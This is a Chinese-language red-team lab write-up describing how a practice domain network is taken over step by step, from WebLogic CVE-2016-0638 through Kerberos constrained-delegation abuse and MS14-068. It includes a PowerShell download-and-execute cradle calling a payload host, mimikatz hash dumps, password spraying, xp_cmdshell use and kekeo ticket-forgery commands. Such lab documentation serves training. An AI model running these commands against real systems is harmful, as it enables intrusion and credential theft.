writeup-渗透攻击红队内网域渗透靶场-1

admin 2024年4月22日07:43:23评论13 views字数 2801阅读9分20秒阅读模式

靶场网络拓扑图

writeup-渗透攻击红队内网域渗透靶场-1

外网打点-web机上线

nmap端口扫描

writeup-渗透攻击红队内网域渗透靶场-1

访问7001端口,是weblogic的web服务端,使用weblogic利用工具进行检测,存在cve-2016-0638

writeup-渗透攻击红队内网域渗透靶场-1

写入webshell,网站目录在 C:OracleMiddlewareOracle_Homewlserverserverlibconsoleappwebapp下,这里注意写入js或者css等静态资源文件目录下,写在根目录下访问会跳转,注意webshell的兼容性,可能会报错

writeup-渗透攻击红队内网域渗透靶场-1

访问webshell

writeup-渗透攻击红队内网域渗透靶场-1

利用powershell远程下载执行上线cs

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.12:800/a.css'))"

writeup-渗透攻击红队内网域渗透靶场-1

因为这里是工作组环境,加上已经是administrator权限,所以没有提权细究,使用ping命令探测内网,发现另一台机子

for /l %i in (1,1,254) do @ping -w 1 -n 1 10.10.20.%i | findstr "TTL="

writeup-渗透攻击红队内网域渗透靶场-1

ms17_010盲打-win7上线

msf设置上层全局代理

writeup-渗透攻击红队内网域渗透靶场-1

对10.10.20.7进行盲打(有蓝屏机率)

writeup-渗透攻击红队内网域渗透靶场-1

上传cs的正向shell,先生成一个exe stage,这里尝试了生成服务的,但是连接失败了,exe可以上线

writeup-渗透攻击红队内网域渗透靶场-1

writeup-渗透攻击红队内网域渗透靶场-1

writeup-渗透攻击红队内网域渗透靶场-1

确定存在域环境

writeup-渗透攻击红队内网域渗透靶场-1

确定域控地址

writeup-渗透攻击红队内网域渗透靶场-1

mimikatz没有抓取到本地明文,应该是没有登陆过的原因,后面尝试域用户登陆了一次,才可以抓取带明文,这里直接抓取本地hash,在线查找破解,密码为admin!@#45

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
john:1000:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c:::

writeup-渗透攻击红队内网域渗透靶场-1

利用kerbrute使用破解得到的密码和net user /domain得到的用户进行密码喷洒,得到一个域用户和密码

writeup-渗透攻击红队内网域渗透靶场-1

查看网卡信息

writeup-渗透攻击红队内网域渗透靶场-1

ping探测

writeup-渗透攻击红队内网域渗透靶场-1

弱口令-sqlserver上线

端口扫描(这里因为环境问题,恢复了一次快照,才扫到了数据库的1433)

writeup-渗透攻击红队内网域渗透靶场-1

writeup-渗透攻击红队内网域渗透靶场-1

fscan指定端口爆破(其他数据库爆破工具也可以),凭证为sa sa

writeup-渗透攻击红队内网域渗透靶场-1

使用rpcon对mssql进行利用,xp_cmdshell命令执行

writeup-渗透攻击红队内网域渗透靶场-1

执行一些长命令和有各种符号的命令时比较麻烦,暂时没有找到合适顺手的正向代理工具,所以利用msf挂一个正向代理

writeup-渗透攻击红队内网域渗透靶场-1

writeup-渗透攻击红队内网域渗透靶场-1

因为win7对外不出网,但是win7和sqlserver这台机子互通,所以使用http-server工具在win7上开启一个建议http服务,用于存放生成的beacon,sqlserver这台机子使用certutil落地文件,上线cs

writeup-渗透攻击红队内网域渗透靶场-1

writeup-渗透攻击红队内网域渗透靶场-1

查看补丁信息,使用cve-2019-1458提升权限,有蓝屏机率,后面换成了ms14_058

writeup-渗透攻击红队内网域渗透靶场-1

mimikatz抓取明文密码

writeup-渗透攻击红队内网域渗透靶场-1

约束委派-访问域控

使用获取到的账户结合adfind查找约束委派用户,返回约束委派用户为sqlserver


AdFind.exe -h 10.10.10.8 -u sqlserver -up Server12345 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

writeup-渗透攻击红队内网域渗透靶场-1

利用约束委派进行攻击,执行kekeo时因为是直接在cs执行的,会一直出现kekeo # ERROR kull_m_cli_read ; ReadConsole (0x00000006)报错,注意进程情况自己kill掉(真实cmd终端下是交互式shell应该不会)

//请求TGT
//生成[email protected][email protected]文件
kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345"

//伪造票据ticket
//生成[email protected]@[email protected]文件
//生成[email protected]@[email protected]文件
kekeo.exe "tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/owa.redteam.red"

//清空内存中的票据
klist purge

//mimikatz导入
mimikatz kerberos::ptt [email protected]@[email protected]

//验证,可能执行几次后就不行了,重复mimikatz那一步即可
dir \owac$

查看flag

writeup-渗透攻击红队内网域渗透靶场-1

ms14_068-域控上线

利用约束委派复制文件到域控,尝试了手动使用psexec以及wmic执行,但未成功,可能是约束委派的权限问题或者其他操作问题?

copy oo.exe \owac$userspublicoo.exe
psexec.exe -accepteula \10.10.10.8 c:userspublicoo.exe

查看c:windowswindowsupdate.log中的补丁信息,使用goldenPac.exe(ms14_068结合psexec)上线CS

writeup-渗透攻击红队内网域渗透靶场-1

得到的直接是system会话

writeup-渗透攻击红队内网域渗透靶场-1

参考链接

其他攻击方式参考:

渗透攻击红队靶场 | Laohuan's Blog

官方公众号参考:

从外网 Weblogic 打进内网,再到约束委派接管域控 (qq.com)

约束委派参考:

一篇文章讲清楚“什么是委派攻击” - FreeBuf网络安全行业门户

ms14_068参考

内网安全之:MS14-068 Kerberos 域用户提权漏洞 - f_carey - 博客园 (cnblogs.com)

原文始发于微信公众号(513 Sec):writeup-渗透攻击红队内网域渗透靶场-1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月22日07:43:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   writeup-渗透攻击红队内网域渗透靶场-1https://cn-sec.com/archives/2574408.html

发表评论

匿名网友 填写信息